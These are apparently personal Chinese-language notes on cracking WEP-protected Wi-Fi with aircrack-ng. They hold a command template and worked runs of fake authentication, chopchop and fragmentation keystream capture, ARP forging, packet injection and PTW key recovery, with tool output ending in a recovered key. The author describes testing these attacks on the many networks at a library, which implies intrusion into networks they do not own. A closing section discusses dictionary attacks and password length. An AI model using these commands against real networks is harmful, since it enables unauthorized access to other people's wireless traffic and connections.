範本

airmon-ng start wlan0
airodump-ng --encry wep mon0
(1-5-2)
airodump-ng --bssid 00:18:F3:7A:9E:07 -c 6 --ivs -w ted mon0
(1-3)
airodump-ng --bssid 00:18:F3:7A:9E:07 -c 6 -w ted mon0
---------------------------

export MAC=00:15:AF:C8:A6:60
export AP=

aireplay-ng -1 0 -a $AP -h $MAC mon0
aireplay-ng -1 6000 -o 1 -q 10 -e -a $AP -h $MAC mon0

(1-4-2)
aireplay-ng -4 -b $AP -h $MAC mon0
packetforge-ng -0 -a $AP -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-1121-044855.xor -w myarp

(1-5-2)
aireplay-ng -5 -b $AP -h $MAC mon0
packetforge-ng -0 -a $AP -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-1105-104939.xor -w myarp

aireplay-ng -2 -r myarp -x 1024 mon0

(1-2)
aireplay-ng -2 -a $AP -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -t 1 -f 0 mon0

(1-3)
aireplay-ng -3 -b $AP -h $MAC -x 1024 mon0

---------------------------
(1-5-2)
aircrack-ng -n 64 ted-*.ivs

(1-3)
aircrack-ng -x -f 2 ted-01.cap

===========================================
Section 1: Singling out the AP you are cracking

aireplay-ng -9 -a 00:06:4F:64:35:D8 -h 00:15:AF:C8:A6:60 mon0

獲得隱藏essid的方法，須要有合法的client端，也就是第零號攻擊的時機
aireplay-ng -0 10 -a AP'MAC -c legal client MAC rausb0

一號攻擊的虛假認證

平時在執行完第一號攻擊後，就不太管它了。祗要專注在接下的情況，該採第二、三、四、還是五號攻擊模式。但這一次實驗中，在進行 (1-5-2)模式時，第二號攻不下，即data沒動。改 (1-4-2) 模式，竟然也攻不下。兩次的xor檔都拿到了，也都轉成arp了，竟inject不成。補上第九號測試攻擊也不克。

改變戰術，重新再虛假認證一次，直接以 (1-4-2)的arp檔進行二號攻擊，成了。改以 (1-5-2)的arp檔攻擊，也成了。

故不是五號或四號的xor沒用，而是在進行中，第一次的虛假認證消失了，得再補上一劑，就ok。

4與5號的xor也有不同

這回在查看有data，無client之情況下，先用 (1-5-2)模式攻擊，順利取得xor並轉成arp檔進行資料灌注。但data並無明顯增長。

別開一console，以第九號攻擊，情況並未改善。

停止第二號資料灌注，改以 (1-4-2)模式，順利取得xor，也轉成另一個arp檔，這回以第二號資料灌注，即成功地使data增大了。順利取得金鑰。

(1-4-2) 攻擊模式

一直沒機會用到第四號攻擊，沒想到，這一次實現了。

一個帶有client的ap，用(1-5-2)採不到xor，用(1-3)得不到cap檔，用(1-2)祗讀取而不發送；最後祗了以第四號攻擊一試。竟一試達陣。

一，
1.airodump-ng --bssid [ap' mac] -c 1 --ivs -w home mon0
a.以存取ivs模式進入頻道一之監控。

二，
1.aireplay-ng -1 0 -a $AP -h $MAC mon0
a.一號攻擊，以自己mac取得ap聯繫。結果：Association successful :-) (AID: 1)

2.aireplay-ng -5 -b $AP -h $MAC mon0
a.以第五號模式攻擊。結果：Still nothing, trying another packet...

3.aireplay-ng -3 -b $AP -h $MAC -x 1024 mon0
a.改以第三號模式攻擊。結果：(got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

4.aireplay-ng -4 -b $AP -h $MAC mon0
a.以第四號模式攻擊。
b.Use this packet ? y
c.Saving chosen packet in replay_src-1106-140117.cap

Offset 87 ( 3% done) | xor = EA | pt = BD | 582 frames written in 9908ms
Offset 86 ( 5% done) | xor = A6 | pt = EF | 256 frames written in 4341ms
Offset 85 ( 7% done) | xor = 5C | pt = B4 | 275 frames written in 4677ms
...
Saving plaintext in replay_dec-1106-140237.cap
Saving keystream in replay_dec-1106-140237.xor
Completed in 76s (0.68 bytes/s)

5.packetforge-ng -0 -a $AP -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-1106-140237.xor -w home-arp
a.把從第四號攻擊得到的xor檔，轉成arp檔。

6.aireplay-ng -2 -r home-arp -x 1024 mon0
a.以arp檔進行第二號攻擊。
b.Use this packet ? y

data終於開始增加了。 good!

三，
1.aircrack-ng -x -f 2 -s home-02.ivs
a.解由airodump所存取的ivs檔。
Starting PTW attack with 43436 ivs.
KEY FOUND! [ xx:xx:xx:xx:xx ]
Decrypted correctly: 100%

第九號攻擊

完成了這個一實驗，wep破解就快修成正果了。來到圖書館，有一堆無線網給你測試，並非每個情況都一樣，蠻好玩的。

這回是碰到了：以(1-5-2)模式攻擊，
一號攻擊，順利取得認證聯繫；
五號攻擊，順利得到xor檔；再以packetforge轉成arp檔；
二號攻擊，data一種是毫無所動，一種是增在一千多就自動停止。

原本以為在能取得xor檔之後，幾乎就等於一定拿得到金鑰。誰知竟然會敗在第二號的交互攻擊。(interactive frame selection)

改以字典破解法攻擊無效，顯然此金鑰設得並不簡單。

突然腦中有一個想法，data不漲是因為所發去的資料沒能注入(inject) ap端，故測測看情況如何。

另開一terminal，執行
aireplay-ng -9 -a [ap's mac] -h [own mac] mon0
結果，...奇蹟出現了。在測試的同時，data開始向上漲了。但測試跑完後，data也停了。漲一次約多進帳了近2000個ivs。接著就不斷以此法去執行「第九號攻擊」。

嚴格來說，-9的用途祗是測試是否能注入資料到ap用，不算是一種攻擊模式；但現在配上第二號攻擊，卻有如此神效，實出乎意料之外。注意：僅第九號測試，data是不會漲的，須配合第二號，兩個terminal同時執行才可。

最後得出的金鑰，果然很長：是六個英文小寫字母加上七個數字，共十三碼，難怪字典破不了。

字典破解

最近破了一個ap，但是是用了一個很取巧的方法。即字典破法，又稱暴力破解。根本不管它的編碼機制，而直接一個一個地去猜，就像在破wpa之樣。

這個情形是這樣的，先以(1-3)(1-2)模式獲取約上千個ivs，將ivs以windows下的aircrack-ng gui版去以字典破解，還好，這個密碼是五個d，字母全一樣，字串又很短，字典裡剛好有，結果一下就找到了。

依此法設法去破其它ap，又重編更大的字典，卻無功而返。編字典的關鍵在於它將字元分四大塊：
1.數字。0..9
2.大寫字母。A-Z
3.小寫字母。a-z
4.其它符號。!@#$

其次是看你要編碼的長度，1-8不等。

若祗要編數字，8碼，則佔 1G
若要數字加大寫字母，8碼，則佔 26,947G
若要數字加大字母加小字母，8碼，則佔 2,063,397G
哪來這麼大硬碟呀

若數字加大小寫字母,5碼,將會佔用 6G
但若增加一碼為6碼,則飊昇到 430G
這也就是為什麼一般密碼設定之建議最少要6碼
做為一個安全門檻

所以在設密碼時，最好是有數字，大字，小字，加符號，長一點，如此最保險。
而字母或數字以愈後面愈難猜中.如不採aA0,而用zZ9

flowchart